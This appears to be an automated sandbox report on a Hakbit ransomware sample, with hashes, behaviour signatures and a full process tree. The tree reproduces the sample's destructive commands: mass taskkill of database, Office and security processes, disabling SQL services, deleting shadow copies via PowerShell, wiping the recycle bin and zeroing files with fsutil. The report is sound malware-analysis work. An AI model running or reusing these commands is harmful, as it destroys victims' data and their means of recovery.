Overview
overview
10Static
static
10Dropper/Berbew.exe
windows10-2004-x64
10Dropper/Phorphiex.exe
windows10-2004-x64
10RAT/31.exe
windows10-2004-x64
10RAT/XClient.exe
windows10-2004-x64
10RAT/file.exe
windows10-2004-x64
7Ransomware...-2.exe
windows10-2004-x64
10Ransomware...01.exe
windows10-2004-x64
10Ransomware...lt.exe
windows10-2004-x64
10Stealers/Azorult.exe
windows10-2004-x64
10Stealers/B...on.exe
windows10-2004-x64
10Stealers/Dridex.dll
windows10-2004-x64
10Stealers/M..._2.exe
windows10-2004-x64
10Stealers/lumma.exe
windows10-2004-x64
10Trojan/BetaBot.exe
windows10-2004-x64
10Trojan/Smo...er.exe
windows10-2004-x64
10Resubmissions
03-09-2024 14:02
240903-rb57sazdqf 1003-09-2024 13:51
240903-q59avszclf 1002-09-2024 19:51
240902-yk8gtsxbpd 1002-09-2024 02:27
240902-cxh7tazflg 1002-09-2024 02:26
240902-cwxc2sygll 1021-06-2024 19:37
240621-yca7cszgnd 1009-06-2024 17:07
240609-vm7rjadd73 1013-05-2024 17:36
240513-v6qblafe3y 1012-05-2024 17:17
240512-vty3zafh5s 10Analysis
-
max time kernel
1794s -
max time network
1805s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
10-05-2024 18:05
Behavioral task
behavioral1
Sample
Dropper/Berbew.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
Dropper/Phorphiex.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
RAT/31.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
RAT/XClient.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
RAT/file.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral6
Sample
Ransomware/Client-2.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
Ransomware/criticalupdate01.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral8
Sample
Ransomware/default.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral9
Sample
Stealers/Azorult.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral10
Sample
Stealers/BlackMoon.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
Stealers/Dridex.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral12
Sample
Stealers/Masslogger/mouse_2.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral13
Sample
Stealers/lumma.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral14
Sample
Trojan/BetaBot.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral15
Sample
Trojan/SmokeLoader.exe
Resource
win10v2004-20240426-en
General
-
Target
Ransomware/Client-2.exe
-
Size
80KB
-
MD5
8152a3d0d76f7e968597f4f834fdfa9d
-
SHA1
c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
-
SHA256
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
-
SHA512
eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
-
SSDEEP
1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0
Malware Config
Extracted
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
hakbit
Signatures
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Client-2.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk Client-2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4872 sc.exe 1092 sc.exe 3852 sc.exe 4544 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 47 IoCs
pid Process 2580 taskkill.exe 4672 taskkill.exe 4636 taskkill.exe 2172 taskkill.exe 1120 taskkill.exe 1444 taskkill.exe 828 taskkill.exe 752 taskkill.exe 3164 taskkill.exe 1492 taskkill.exe 1336 taskkill.exe 872 taskkill.exe 2636 taskkill.exe 3704 taskkill.exe 4980 taskkill.exe 3256 taskkill.exe 1852 taskkill.exe 1624 taskkill.exe 2992 taskkill.exe 3772 taskkill.exe 4192 taskkill.exe 3372 taskkill.exe 3224 taskkill.exe 4076 taskkill.exe 3696 taskkill.exe 3248 taskkill.exe 1964 taskkill.exe 4240 taskkill.exe 4984 taskkill.exe 368 taskkill.exe 1520 taskkill.exe 4548 taskkill.exe 5052 taskkill.exe 2272 taskkill.exe 2308 taskkill.exe 2708 taskkill.exe 3220 taskkill.exe 1164 taskkill.exe 4588 taskkill.exe 4572 taskkill.exe 4284 taskkill.exe 556 taskkill.exe 2324 taskkill.exe 1428 taskkill.exe 4028 taskkill.exe 5100 taskkill.exe 3560 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1632 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5776 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe 2568 Client-2.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 2568 Client-2.exe Token: SeDebugPrivilege 4984 taskkill.exe Token: SeDebugPrivilege 2272 taskkill.exe Token: SeDebugPrivilege 4192 taskkill.exe Token: SeDebugPrivilege 3696 taskkill.exe Token: SeDebugPrivilege 4980 taskkill.exe Token: SeDebugPrivilege 4240 taskkill.exe Token: SeDebugPrivilege 2324 taskkill.exe Token: SeDebugPrivilege 2308 taskkill.exe Token: SeDebugPrivilege 2580 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeDebugPrivilege 2636 taskkill.exe Token: SeDebugPrivilege 4284 taskkill.exe Token: SeDebugPrivilege 2172 taskkill.exe Token: SeDebugPrivilege 4588 taskkill.exe Token: SeDebugPrivilege 4572 taskkill.exe Token: SeDebugPrivilege 3220 taskkill.exe Token: SeDebugPrivilege 4672 taskkill.exe Token: SeDebugPrivilege 5100 taskkill.exe Token: SeDebugPrivilege 2992 taskkill.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 3248 taskkill.exe Token: SeDebugPrivilege 1164 taskkill.exe Token: SeDebugPrivilege 3560 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 1492 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 828 taskkill.exe Token: SeDebugPrivilege 1336 taskkill.exe Token: SeDebugPrivilege 3704 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 3372 taskkill.exe Token: SeDebugPrivilege 752 taskkill.exe Token: SeDebugPrivilege 2708 taskkill.exe Token: SeDebugPrivilege 4076 taskkill.exe Token: SeDebugPrivilege 3772 taskkill.exe Token: SeDebugPrivilege 5052 taskkill.exe Token: SeDebugPrivilege 3164 taskkill.exe Token: SeDebugPrivilege 1444 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 368 taskkill.exe Token: SeDebugPrivilege 3224 taskkill.exe Token: SeDebugPrivilege 3256 taskkill.exe Token: SeDebugPrivilege 4028 taskkill.exe Token: SeDebugPrivilege 556 taskkill.exe Token: SeDebugPrivilege 4840 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2568 Client-2.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2568 Client-2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2568 wrote to memory of 1092 2568 Client-2.exe 92 PID 2568 wrote to memory of 1092 2568 Client-2.exe 92 PID 2568 wrote to memory of 4872 2568 Client-2.exe 94 PID 2568 wrote to memory of 4872 2568 Client-2.exe 94 PID 2568 wrote to memory of 4544 2568 Client-2.exe 95 PID 2568 wrote to memory of 4544 2568 Client-2.exe 95 PID 2568 wrote to memory of 3852 2568 Client-2.exe 96 PID 2568 wrote to memory of 3852 2568 Client-2.exe 96 PID 2568 wrote to memory of 4984 2568 Client-2.exe 97 PID 2568 wrote to memory of 4984 2568 Client-2.exe 97 PID 2568 wrote to memory of 2272 2568 Client-2.exe 101 PID 2568 wrote to memory of 2272 2568 Client-2.exe 101 PID 2568 wrote to memory of 3780 2568 Client-2.exe 103 PID 2568 wrote to memory of 3780 2568 Client-2.exe 103 PID 2568 wrote to memory of 828 2568 Client-2.exe 104 PID 2568 wrote to memory of 828 2568 Client-2.exe 104 PID 2568 wrote to memory of 2580 2568 Client-2.exe 105 PID 2568 wrote to memory of 2580 2568 Client-2.exe 105 PID 2568 wrote to memory of 2308 2568 Client-2.exe 109 PID 2568 wrote to memory of 2308 2568 Client-2.exe 109 PID 2568 wrote to memory of 4284 2568 Client-2.exe 110 PID 2568 wrote to memory of 4284 2568 Client-2.exe 110 PID 2568 wrote to memory of 3560 2568 Client-2.exe 113 PID 2568 wrote to memory of 3560 2568 Client-2.exe 113 PID 2568 wrote to memory of 1444 2568 Client-2.exe 114 PID 2568 wrote to memory of 1444 2568 Client-2.exe 114 PID 2568 wrote to memory of 3772 2568 Client-2.exe 115 PID 2568 wrote to memory of 3772 2568 Client-2.exe 115 PID 2568 wrote to memory of 4192 2568 Client-2.exe 116 PID 2568 wrote to memory of 4192 2568 Client-2.exe 116 PID 2568 wrote to memory of 5052 2568 Client-2.exe 117 PID 2568 wrote to memory of 5052 2568 Client-2.exe 117 PID 2568 wrote to memory of 3164 2568 Client-2.exe 118 PID 2568 wrote to memory of 3164 2568 Client-2.exe 118 PID 2568 wrote to memory of 4572 2568 Client-2.exe 119 PID 2568 wrote to memory of 4572 2568 Client-2.exe 119 PID 2568 wrote to memory of 3256 2568 Client-2.exe 120 PID 2568 wrote to memory of 3256 2568 Client-2.exe 120 PID 2568 wrote to memory of 1120 2568 Client-2.exe 121 PID 2568 wrote to memory of 1120 2568 Client-2.exe 121 PID 2568 wrote to memory of 4240 2568 Client-2.exe 122 PID 2568 wrote to memory of 4240 2568 Client-2.exe 122 PID 2568 wrote to memory of 2172 2568 Client-2.exe 123 PID 2568 wrote to memory of 2172 2568 Client-2.exe 123 PID 2568 wrote to memory of 4588 2568 Client-2.exe 124 PID 2568 wrote to memory of 4588 2568 Client-2.exe 124 PID 2568 wrote to memory of 1964 2568 Client-2.exe 125 PID 2568 wrote to memory of 1964 2568 Client-2.exe 125 PID 2568 wrote to memory of 4636 2568 Client-2.exe 126 PID 2568 wrote to memory of 4636 2568 Client-2.exe 126 PID 2568 wrote to memory of 4548 2568 Client-2.exe 127 PID 2568 wrote to memory of 4548 2568 Client-2.exe 127 PID 2568 wrote to memory of 4980 2568 Client-2.exe 128 PID 2568 wrote to memory of 4980 2568 Client-2.exe 128 PID 2568 wrote to memory of 3704 2568 Client-2.exe 129 PID 2568 wrote to memory of 3704 2568 Client-2.exe 129 PID 2568 wrote to memory of 1520 2568 Client-2.exe 130 PID 2568 wrote to memory of 1520 2568 Client-2.exe 130 PID 2568 wrote to memory of 5100 2568 Client-2.exe 131 PID 2568 wrote to memory of 5100 2568 Client-2.exe 131 PID 2568 wrote to memory of 2636 2568 Client-2.exe 132 PID 2568 wrote to memory of 2636 2568 Client-2.exe 132 PID 2568 wrote to memory of 368 2568 Client-2.exe 133 PID 2568 wrote to memory of 368 2568 Client-2.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:1092
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:4872
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:4544
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:3852
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:3780
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:4548
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1632
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:5888
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:5776
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:5996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe2⤵PID:2080
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:5132
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4084,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=1680 /prefetch:81⤵PID:6700
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1404,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=2468 /prefetch:81⤵PID:3480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD51964c7fb9ebc3dfe7d83955d125c71ff
SHA132eb06f534e5c6dc718c9deeb93bbb768e3eefe9
SHA2562912dad15db3290cf595606761bbf70594b23a45b0869cbf2769dc96e76c5357
SHA5120038603b0c2251eccdc70adfe02ddebf01eb91319d1ac4cdd94b87cf5577a3ddbee405995efca2062c13a4d006032548e7da0b1edfa5b3a3dd1201330bbf65be
-
C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi
Filesize28.8MB
MD5729780f3e432cbafaaea8de045960377
SHA19f82179cf3d2aaa623d9f68eafc4059e21c3e836
SHA25605498bfac74c818c5cf43af25c73ea92f23546f6087712d99ddefd5ed042bf95
SHA5120ca497f39d7c02913b285ec06cc9400b4eaf2ea2097430778b09c85f2cd94d4fe1e39383e7a9b6535727b266f10d2ee4db264edbe49d8a622935f44250f58ae4
-
C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]
Filesize728KB
MD5eb28637f05b203758cbf9b614fa331b9
SHA1f60aa4f5adf5ba7725fb0df7cb75ee5c096641f3
SHA256ddc91e9c08a7f56f24055f4c892f59e3b292e4232fb2888f57a6a507201c761d
SHA512837ddf90d26e374692d80785e2da0b7645dfa88f1dfebccd917010845316da54b401106910f153657b274795bd8408e79b84eb357e7c44b2ab39118784f82434
-
C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi
Filesize25.7MB
MD5bdfd54639c22d4fde441fd455a5e72a2
SHA13a86fbf43ae0b402e9ddf8aba9e2cdbbc073fdae
SHA25664bbb364b4faf1afcc69e41c3da1a56777c7064beeb2dd33d67901a39f267433
SHA51219f8cc989f92538e8b224af8c51604d9ef9cbc1d3438f78914963ce76f010fe2d26f2bf6d9293caea662eb7cb4960166a252e1246592329c56c79cc668d4ce82
-
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]
Filesize180KB
MD53aa8c48069dee49121d8669b53e4660a
SHA1a628e726e36ad8e6d1e8958c66dcc6bfef77a0e6
SHA256a9f3748c041b7bfd83b829f0dc19597391928264ebed09e4937deedd2232e834
SHA5127ae87923606142d7327010b5c9d8235c39e95724a4f97d39832f7e5e7ee0bbbe26f730e2453e491ead13b085e3c6dc6eb34270ab78c7079887372c02ca792bc0
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
828B
MD519a3c2f197b43912369b3041d86c3e37
SHA15d5094f4c01c027be108770ee8e8043279532a25
SHA2566088c6d2e7f2c02ee2ccda670fa67d1464b0dd615764fb3c7bef71f9c3bcfb6d
SHA512010250b80239afcac8e5a94a21d8058a4a4f9875b82870af35632f59decd9403faf42d14cbb01cd489ef91be436e88d350196c541198c3d4bfbee859b18e78fb